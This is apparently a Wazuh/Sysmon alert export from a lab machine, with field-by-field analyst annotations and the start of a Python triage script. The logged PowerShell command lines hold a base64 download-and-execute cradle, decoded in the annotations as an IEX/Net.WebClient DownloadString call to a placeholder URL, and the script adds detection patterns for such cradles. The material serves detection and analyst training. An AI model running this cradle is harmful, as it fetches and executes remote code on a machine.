data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:16.9762322Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284470 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:16.919
ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ProcessId: 15624
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zanwxrjo.ewu.ps1
CreationUtcTime: 2025-04-24 22:38:16.916
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:16.919 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd57-680a-6e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zanwxrjo.ewu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:16.916 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 68 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534300.1596097 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:18.9901696Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284498 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:17.923
ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ProcessId: 15800
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ParentProcessId: 15624
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:17.923 UTC time Sysmon recorded for the process start itself; the timestamp to use in timelines (data.win.system.systemTime is only when the record was written).
data.win.eventdata.processGuid: {94294ddc-bd59-680a-700b-000000000e00} Sysmon's unique identifier for this process. PIDs are reused, GUIDs are not, so pivot on this to tie EID 1, EID 11 and other Sysmon events to one process.
data.win.eventdata.processId: 15800 PID of the new process. Windows recycles PIDs, so use it only together with processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that was started. The doubled backslashes are JSON escaping in the Wazuh alert, not part of the path.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) File version from the binary's version resource; 10.0.26100 is the Windows 11 24H2 build line.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the version resource. Trivially forged, so never treat it as proof of a signed Microsoft binary; check the hash or signature instead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary. It survives a rename on disk, so PowerShell.EXE under a different image name is a classic masquerading tell.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line of the new process. -NoProfile skips profile scripts; -EncodedCommand takes base64 of UTF-16LE, which is why the blob is full of "A". Decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. The \" and \\ are JSON escaping.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root is typical of a shell started from an interactive session.
data.win.eventdata.user: Attacker\\Attcker1 Account (DOMAIN\user) the process runs as. The domain part equals the hostname (Attacker), so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session; constant across every process in this chain, so all of it happened in one session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. It matches the Logon ID in Security event 4624, so use it to find how and when this session authenticated.
data.win.eventdata.terminalSessionId: 1 Windows session number: 0 is services, 1 or higher is an interactive console or RDP session.
data.win.eventdata.integrityLevel: Medium Mandatory integrity level of the process token. Medium = standard, unelevated user; High would mean an elevated (administrator) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image file, algorithms as configured in Sysmon. Identical to the parent's, so both are the same on-disk powershell.exe; compare against a known-good baseline rather than a threat feed.
data.win.eventdata.parentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} Sysmon GUID of the parent; pivot on it to see what the parent did before spawning this child.
data.win.eventdata.parentProcessId: 15624 PID of the parent. Its own EID 1 is not in this excerpt, so the chain starts earlier than what is shown here.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent. powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, identical to the child's: each generation re-launches the same encoded command, which is why rules 92057 and 92213 keep firing in pairs.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent ran as; same user, so no privilege change between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, not a verdict: here the "executable" is a PowerShell .ps1 in the user's Temp folder, so check data.win.eventdata.targetFilename before acting.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 72 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534301.1604168 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon telemetry, so field meanings follow the Sysmon schema, not the Security log.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon ETW provider; stable across installs, so filter on it if the provider name is ever rewritten.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log ID: 11 = FileCreate (1 = Process Create, 3 = Network connection). Check the channel before applying 4624/4688-style lookups.
data.win.system.version: 2 Schema version of this event type; Sysmon bumps it when fields are added or renamed, so parsers should key on it.
data.win.system.level: 4 Numeric severity: 4 = Information. Sysmon logs almost everything at level 4, so never triage by this field.
data.win.system.task: 11 Task category; in Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:19.2856439Z Time the record was written to the Event Log (UTC). It trails data.win.eventdata.utcTime (22:38:19.204) by under a tenth of a second; use utcTime in timelines.
data.win.system.eventRecordID: 284499 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service process that wrote the record (3712 in every alert here), not of the process under investigation; that one is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event Log channel the record came from; confirms Sysmon telemetry and is the channel the Wazuh agent must subscribe to.
data.win.system.computer: Attacker Hostname recorded by Windows; should match agent.name. A mismatch means forwarded or relabelled events.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:19.204
ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ProcessId: 15800
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tfqszefa.cbk.ps1
CreationUtcTime: 2025-04-24 22:38:19.204
User: Attacker\Attcker1" Sysmon's rendered message text (File created); the same fields are parsed one by one under data.win.eventdata below.
data.win.eventdata.utcTime: 2025-04-24 22:38:19.204 UTC time Sysmon recorded the file creation; roughly a second after the creating process started in the EID 1 above (22:38:17.923).
data.win.eventdata.processGuid: {94294ddc-bd59-680a-700b-000000000e00} GUID of the process that created the file. It equals the processGuid of the EID 1 above (PID 15800), so this file came from the encoded-command PowerShell, not from a separate dropper.
data.win.eventdata.processId: 15800 PID of the creating process; consistent with the GUID link, but PIDs recycle, so trust the GUID.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that wrote the file: PowerShell itself.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tfqszefa.cbk.ps1 Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in %TEMP% is written by every powershell.exe start-up to test whether AppLocker/WDAC enforces script rules; it is a side effect of the launch in the matching EID 1, not a payload. Rule 92213 fires on a .ps1 in a Temp folder regardless, so the actionable signal in this pair is the EID 1 / rule 92057.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:19.204 Creation timestamp of the file itself. Equal to utcTime here; if it were earlier than utcTime the timestamp was backdated (timestomping, which Sysmon also reports as EID 2).
data.win.eventdata.user: Attacker\\Attcker1 Account that created the file; the same local user as the process chain.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 69 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534304.1606937 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon telemetry, so field meanings follow the Sysmon schema, not the Security log.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon ETW provider; stable across installs, so filter on it if the provider name is ever rewritten.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log ID: 1 = Process Create (11 = FileCreate, 3 = Network connection). Check the channel before applying 4624/4688-style lookups.
data.win.system.version: 5 Schema version of this event type; Sysmon bumps it when fields are added or renamed, so parsers should key on it.
data.win.system.level: 4 Numeric severity: 4 = Information. Sysmon logs almost everything at level 4, so never triage by this field.
data.win.system.task: 1 Task category; in Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:22.3661813Z Time the record was written to the Event Log (UTC). It lands almost two seconds after data.win.eventdata.utcTime (22:38:20.548), a normal lag for Sysmon EID 1; use utcTime in timelines.
data.win.system.eventRecordID: 284546 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service process that wrote the record (3712 in every alert here), not of the process under investigation; that one is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event Log channel the record came from; confirms Sysmon telemetry and is the channel the Wazuh agent must subscribe to.
data.win.system.computer: Attacker Hostname recorded by Windows; should match agent.name. A mismatch means forwarded or relabelled events.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:20.548
ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ProcessId: 15900
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ParentProcessId: 15800
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text (Process Create); the same fields are parsed one by one under data.win.eventdata below.
data.win.eventdata.utcTime: 2025-04-24 22:38:20.548 UTC time Sysmon recorded for the process start itself; the timestamp to use in timelines (data.win.system.systemTime is only when the record was written).
data.win.eventdata.processGuid: {94294ddc-bd5c-680a-720b-000000000e00} Sysmon's unique identifier for this process. PIDs are reused, GUIDs are not, so pivot on this to tie EID 1, EID 11 and other Sysmon events to one process.
data.win.eventdata.processId: 15900 PID of the new process. Windows recycles PIDs, so use it only together with processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that was started. The doubled backslashes are JSON escaping in the Wazuh alert, not part of the path.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) File version from the binary's version resource; 10.0.26100 is the Windows 11 24H2 build line.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the version resource. Trivially forged, so never treat it as proof of a signed Microsoft binary; check the hash or signature instead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary. It survives a rename on disk, so PowerShell.EXE under a different image name is a classic masquerading tell.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line of the new process. -NoProfile skips profile scripts; -EncodedCommand takes base64 of UTF-16LE, which is why the blob is full of "A". Decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. The \" and \\ are JSON escaping.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root is typical of a shell started from an interactive session.
data.win.eventdata.user: Attacker\\Attcker1 Account (DOMAIN\user) the process runs as. The domain part equals the hostname (Attacker), so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session; constant across every process in this chain, so all of it happened in one session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. It matches the Logon ID in Security event 4624, so use it to find how and when this session authenticated.
data.win.eventdata.terminalSessionId: 1 Windows session number: 0 is services, 1 or higher is an interactive console or RDP session.
data.win.eventdata.integrityLevel: Medium Mandatory integrity level of the process token. Medium = standard, unelevated user; High would mean an elevated (administrator) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image file, algorithms as configured in Sysmon. Identical to the parent's, so both are the same on-disk powershell.exe; compare against a known-good baseline rather than a threat feed.
data.win.eventdata.parentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} Sysmon GUID of the parent. It is the processGuid of the EID 1 alert earlier on this page (PID 15800), so this is the second generation of the chain.
data.win.eventdata.parentProcessId: 15800 PID of the parent; consistent with the GUID link above.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent. powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, identical to the child's: each generation re-launches the same encoded command, which is why rules 92057 and 92213 keep firing in pairs.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent ran as; same user, so no privilege change between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
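The two alert types above (rule 92057 on Sysmon EID 1 and rule 92213 on EID 11) arrive in pairs with the same encoded command and the same Temp-folder probe file. The script below is an added example, not part of the original alert dump and not Wazuh code; it performs the triage an analyst would otherwise do by hand: decode the -EncodedCommand blob, flag the download cradle and pull out its URL, rebuild the powershell.exe parent chain by ProcessGuid, and attribute each EID 11 file create to the PowerShell launch that produced it. The alert dicts are constructed from the data.win.eventdata values shown on this page, and the verdict labels ("powershell-policy-probe", "review") are the example's own.

```python
# Triage helper for the Sysmon EID 1 / EID 11 PowerShell alerts on this page. Added
# example, not Wazuh code; the alert fields are constructed from the values above.
import base64
import re

PS_EXE = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = (  # base64 of UTF-16LE, copied from the alerts' CommandLine
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A"
    "dAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8A"
    "ZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
CMDLINE = f'"{PS_EXE}" "{PS_EXE}" -NoLogo -NoProfile -EncodedCommand {ENCODED}'

def eid1(guid, pid, parent_guid, parent_pid, when):
    return {"eventID": "1", "utcTime": when, "image": PS_EXE, "commandLine": CMDLINE,
            "processGuid": guid, "processId": pid,
            "parentProcessGuid": parent_guid, "parentProcessId": parent_pid}

def eid11(guid, pid, name, when):
    return {"eventID": "11", "utcTime": when, "image": PS_EXE, "processGuid": guid,
            "processId": pid,
            "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp" + "\\" + name}

# data.win.eventdata of the alerts above: three chained EID 1s and two EID 11s.
ALERTS = [
    eid1("{94294ddc-bd59-680a-700b-000000000e00}", "15800",
         "{94294ddc-bd57-680a-6e0b-000000000e00}", "15624", "2025-04-24 22:38:17.923"),
    eid11("{94294ddc-bd59-680a-700b-000000000e00}", "15800",
          "__PSScriptPolicyTest_tfqszefa.cbk.ps1", "2025-04-24 22:38:19.204"),
    eid1("{94294ddc-bd5c-680a-720b-000000000e00}", "15900",
         "{94294ddc-bd59-680a-700b-000000000e00}", "15800", "2025-04-24 22:38:20.548"),
    eid11("{94294ddc-bd5c-680a-720b-000000000e00}", "15900",
          "__PSScriptPolicyTest_uba1xjco.x5u.ps1", "2025-04-24 22:38:22.512"),
    eid1("{94294ddc-bd5f-680a-740b-000000000e00}", "16016",
         "{94294ddc-bd5c-680a-720b-000000000e00}", "15900", "2025-04-24 22:38:23.806"),
]

def decode_encoded_command(command_line):
    """Plaintext behind -EncodedCommand (any unambiguous prefix: -e, -enc ...), or None.
    The payload is base64 of UTF-16LE, hence a blob full of 'A' (zero high bytes)."""
    tokens = re.findall(r'"[^"]*"|\S+', command_line)
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok[:1] in "-/" and name and (name == "ec" or "encodedcommand".startswith(name)):
            blob = tokens[i + 1].strip("\"'")
            blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

CRADLE = {
    "invoke": r"\b(?:iex|invoke-expression)\b",
    "client": r"\b(?:net\.webclient|invoke-webrequest|iwr|invoke-restmethod|irm)\b",
    "download": r"\.download(?:string|file|data)\s*\(",
}
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

def classify_cradle(script):
    """Flag the download-and-execute cradle shape and extract the URL to block."""
    hits = {k: bool(re.search(p, script, re.I)) for k, p in CRADLE.items()}
    m = URL.search(script)
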